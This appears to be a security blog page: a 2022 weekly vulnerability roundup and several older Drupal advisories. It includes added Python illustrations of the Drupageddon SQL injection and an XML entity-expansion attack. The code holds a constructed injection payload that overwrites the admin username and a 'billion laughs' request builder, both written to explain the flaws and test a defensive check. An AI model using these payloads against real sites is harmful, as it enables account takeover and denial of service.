
Cybersecurity Updates For Week 16 of 2022

CVE-2021-3970, CVE-2021-3971, CVE-2021-3972: Lenovo UEFI Firmware Vulnerabilities

Security company ESET disclosed three vulnerabilities in the UEFI firmware of Lenovo consumer laptops, affecting over a hundred models including the Lenovo Flex, IdeaPad, Legion, V14/V15/V17 and Yoga series. Two of them (CVE-2021-3971 and CVE-2021-3972) stem from drivers intended only for the manufacturing process that were left in production firmware; they let an attacker with elevated local privileges disable SPI flash write protection or UEFI Secure Boot by setting an NVRAM variable. The third (CVE-2021-3970) is a memory-corruption bug in an SMM handler that allows code execution with SMM privileges. Lenovo has published firmware updates, so affected models should have their BIOS version checked against Lenovo's advisory.

Read more:
https://securityonline.info/cve-2021-3970-lenovo-uefi-firmware-vulnerabilities/

Hackers Are Getting Caught Exploiting New Bugs More Than Ever

A pair of reports from Mandiant and Google found a spike in exploited zero-day vulnerabilities in 2021. The question is, why?

Read more:
https://www.wired.com/story/zero-day-exploits-vulnerabilities-google-mandiant/

Access Bypass, Data Overwrite Vulnerabilities Patched in Drupal

Drupal on Wednesday announced the release of security updates that resolve two vulnerabilities which could lead to access bypass and data overwrite.

Read More:
https://www.securityweek.com/access-bypass-data-overwrite-vulnerabilities-patched-drupal

Other news worth mentioning:

Amazon’s Hotpatch for Log4j Flaw Found Vulnerable to Privilege Escalation Bug
Critical Chipset Bugs Open Millions of Android Devices to Remote Spying
Denonia Malware Shows Evolving Cloud Threats
Oracle Releases 520 New Security Patches With April 2022 CPU
Emotet reestablishes itself at the top of the malware world

Drupageddon

Drupal 7 includes a database abstraction API to ensure that queries executed against the database are sanitized to prevent SQL injection attacks.

A vulnerability in this API allows an attacker to send specially crafted requests that result in arbitrary SQL execution. The flaw sits in the expansion of array-valued placeholders: the per-element placeholder names were built from the submitted array keys, so request data could end up in the SQL text instead of being bound as a value. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks.

This vulnerability can be exploited by anonymous users.

More information:
https://www.drupal.org/SA-CORE-2014-005
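To make the placeholder-expansion flaw concrete, here is an added Python model of it; this is not Drupal's own code. It re-implements the logic of Drupal 7's DatabaseConnection::expandArguments() in its vulnerable (7.31) and fixed (7.32) forms, plus a rough stand-in for PDO's emulated prepares, so you can see the SQL that would reach MySQL. The login query shape, the quoting helper and the posted values are constructed for the example.

```python
"""Model of the Drupal 7.31 placeholder-expansion bug (SA-CORE-2014-005).

Added illustration in Python, not Drupal's own code.  It re-implements the
logic of DatabaseConnection::expandArguments() in the vulnerable (7.31) and
fixed (7.32) variants, plus a rough stand-in for PDO's emulated prepares, so
the SQL that reaches MySQL can be inspected.  The query, the 'posted' values
and the quoting helper are constructed here.
"""
import re

# Shape of the query Drupal 7's login validation handler ran with the
# submitted username as the bound value (constructed approximation).
LOGIN_QUERY = "SELECT * FROM users WHERE name = :name AND status = 1"

PLACEHOLDER = re.compile(r":[A-Za-z0-9_]+")


def _expand(query, args, keys_for):
    """Shared expansion loop; keys_for() decides how the per-element
    placeholder suffixes are derived from an array-valued argument."""
    args = dict(args)
    for key, data in [(k, v) for k, v in args.items() if isinstance(v, dict)]:
        new_keys = {f"{key}_{suffix}": value for suffix, value in keys_for(data)}
        # preg_replace('#' . $key . '\b#', implode(', ', keys), $query)
        query = re.sub(re.escape(key) + r"\b", lambda _m: ", ".join(new_keys), query)
        del args[key]
        args.update(new_keys)
    return query, args


def expand_arguments_vulnerable(query, args):
    """7.31: suffixes come from the array KEYS, which the request controls."""
    return _expand(query, args, lambda data: data.items())


def expand_arguments_fixed(query, args):
    """7.32: array_values() first, so suffixes are always 0, 1, 2, ..."""
    return _expand(query, args, lambda data: enumerate(data.values()))


def emulate_prepare(query, args):
    """Stand-in for PDO emulated prepares (the MySQL default at the time):
    find placeholder tokens by regex, require the bound-value count to equal
    the token count, then splice quoted values in client-side.  Anything that
    is not a token, such as ' ;UPDATE ...' after one, is passed through."""
    tokens = PLACEHOLDER.findall(query)
    if len(tokens) != len(args):
        raise ValueError("number of bound variables does not match number of tokens")

    def quote(value):
        return "'" + str(value).replace("\\", "\\\\").replace("'", "\\'") + "'"

    def substitute(match):
        token = match.group(0)
        if token not in args:
            raise ValueError(f"parameter {token} was not defined")
        return quote(args[token])

    return PLACEHOLDER.sub(substitute, query)


def login_sql(posted_name, expand=expand_arguments_vulnerable):
    """SQL that would reach MySQL when `posted_name` is the 'name' form value.
    A plain string is the normal case; a dict models PHP receiving
    name[...]=... pairs, which it turns into an array."""
    query, args = expand(LOGIN_QUERY, {":name": posted_name})
    return emulate_prepare(query, args)


# Constructed attacker input with the shape of the public 2014 PoC:
#   name[0 ;UPDATE users SET name='owned' WHERE uid = 1;#]=x&name[0]=y
# The harmless second element matters: PDO finds two ':name_0' tokens in the
# expanded text and there are two bound values, so the count check passes.
EVIL_NAME = {
    "0 ;UPDATE users SET name='owned' WHERE uid = 1;#": "x",
    "0": "y",
}

if __name__ == "__main__":
    print("7.31:", login_sql(EVIL_NAME))
    print("7.32:", login_sql(EVIL_NAME, expand_arguments_fixed))
```

With the 7.31 logic the attacker's array key becomes part of the statement text and the `#` comments out the remainder, so MySQL receives a SELECT followed by an attacker-chosen UPDATE. With the 7.32 logic the same input only produces a syntactically broken but harmless `name = 'x', 'y'` clause, because the keys are thrown away before placeholder names are built.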

WordPress and Drupal patched for DDoS vulnerability

WordPress and Drupal have been patched for, amongst other things, a vulnerability that allows an attacker to take down a WordPress or Drupal site.

The XML-RPC endpoint of both projects uses a PHP XML parser that is vulnerable to an XML entity expansion attack and related XML payload attacks. A crafted request can exhaust CPU and memory and push the site's database to its maximum number of open connections; any of these may leave the site unavailable or unresponsive (denial of service).

Users of WordPress should upgrade to 3.9.2, and users of Drupal to 6.33 or 7.31, as soon as possible.

More information:
https://www.drupal.org/SA-CORE-2014-004
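The following is an added Python example, not WordPress's or Drupal's code, showing what an entity-expansion XML-RPC request looks like and how to refuse it before a parser ever expands anything. It builds a constructed "billion laughs" style request, estimates from the DTD how large the body would become after expansion without expanding it, and gates input on a DOCTYPE check (XML-RPC never legitimately carries a DTD, which is the approach the 2014 fixes took) plus an expansion budget. The size limits are assumptions chosen for the example.

```python
"""Entity-expansion check for an XML-RPC endpoint.

Added illustration, not WordPress's or Drupal's own code.  It builds a
constructed 'billion laughs' style XML-RPC request, estimates from the DTD
how large the entity references in the body would expand to WITHOUT letting
a parser expand them, and shows a pre-parse gate that refuses such input.
The DOCTYPE rejection mirrors the 2014 fixes; the size limits are assumed.
"""
import re

ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r"&(\w+);")


def build_expansion_payload(depth=5, fanout=10):
    """Constructed request: lolN expands to fanout**N copies of 'lol', and the
    body references the deepest entity once."""
    decls = ['<!ENTITY lol0 "lol">']
    for level in range(1, depth + 1):
        refs = f"&lol{level - 1};" * fanout
        decls.append(f'<!ENTITY lol{level} "{refs}">')
    dtd = "<!DOCTYPE methodCall [\n" + "\n".join(decls) + "\n]>"
    body = ("<methodCall><methodName>pingback.ping</methodName>"
            f"<params><param><value>&lol{depth};</value></param></params></methodCall>")
    return '<?xml version="1.0"?>\n' + dtd + "\n" + body


def _split_dtd(doc):
    """Return (dtd_text, body_text); an absent DTD yields ('', doc)."""
    end = doc.find("]>")
    return (doc[: end + 2], doc[end + 2 :]) if end >= 0 else ("", doc)


def _expanded_size(text, sizes):
    """Length of `text` once every known entity reference is replaced by its
    already-computed expanded size.  Unknown references count literally."""
    total, pos = 0, 0
    for m in ENTITY_REF.finditer(text):
        total += m.start() - pos
        total += sizes.get(m.group(1), len(m.group(0)))
        pos = m.end()
    return total + len(text) - pos


def entity_sizes(doc):
    """Expanded size of each internal general entity.  Declarations may refer
    to entities declared later, so iterate to a fixed point; a recursive
    (ill-formed) DTD simply stops at the pass cap."""
    dtd, _ = _split_dtd(doc)
    decls = ENTITY_DECL.findall(dtd)
    sizes = {}
    for _ in range(len(decls) + 1):
        updated = {name: _expanded_size(value, sizes) for name, value in decls}
        if updated == sizes:
            break
        sizes = updated
    return sizes


def expanded_length(doc):
    """How many characters the document body would occupy after expansion."""
    _, body = _split_dtd(doc)
    return _expanded_size(body, entity_sizes(doc))


def is_acceptable_xmlrpc(doc, max_bytes=1_000_000, max_expansion=10_000_000):
    """Pre-parse gate (assumed limits).  XML-RPC never needs a DTD, so a
    DOCTYPE is refused outright; the expansion estimate is a second line of
    defence for parsers that still honour internal entities."""
    if len(doc) > max_bytes:
        return False
    if "<!DOCTYPE" in doc.upper():
        return False
    return expanded_length(doc) <= max_expansion


if __name__ == "__main__":
    payload = build_expansion_payload()
    print(len(payload), "bytes on the wire ->", expanded_length(payload), "after expansion")
    print("accepted:", is_acceptable_xmlrpc(payload))
```

The point of the estimate is that a 600-byte request can legitimately be parsed into hundreds of kilobytes, and a slightly deeper DTD into gigabytes, so the check must run on the raw bytes before the parser sees them; applying a size limit after parsing is too late.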
Drupal core – Highly Critical Vulnerability

Drupal has sent out a notification about new highly critical issues with the Drupal core. This means that anyone running Drupal should update as soon as possible.

Advisory ID: DRUPAL-SA-CORE-2013-003
Project: Drupal core
Version: 6.x, 7.x
Date: 2013-November-20
Security risk: Highly critical
Exploitable from: Remote
Vulnerability: Multiple vulnerabilities

More information: https://drupal.org/security

Drupal.org compromised – 967,659 users and (hashed) passwords stolen

The Drupal.org Security Team and Infrastructure Team have discovered unauthorized access to account information on Drupal.org and groups.drupal.org.

Information exposed includes usernames, email addresses, and country information, as well as hashed passwords. However, we are still investigating the incident and may learn about other types of information compromised, in which case we will notify you accordingly. As a precautionary measure, we’ve reset all Drupal.org account holder passwords and are requiring users to reset their passwords at their next login attempt. A user password can be changed at any time by taking the following steps.

Go to https://drupal.org/user/password
Enter your username or email address.
Check your email and follow the link to enter a new password.
It can take up to 15 minutes for the password reset email to arrive. If you do not receive the e-mail within 15 minutes, make sure to check your spam folder as well.

Using the same password for different websites is a very bad idea, and you should avoid it as much as you can. Security tips regarding passwords can be found in our newsletter here: http://bfblogg.wpengine.com/blog/2013/03/08/basefarm-sirt-newsletter-2013-03-08/

More information: https://drupal.org/news/130529SecurityUpdate

High Risk Drupal Vulnerability

New vulnerabilities have been disclosed for Drupal versions earlier than 6.28 and 7.19. If you run Drupal, update as soon as possible: among other things, unpatched sites are exposed to XSS attacks.

More information:
http://drupal.org/SA-CORE-2013-001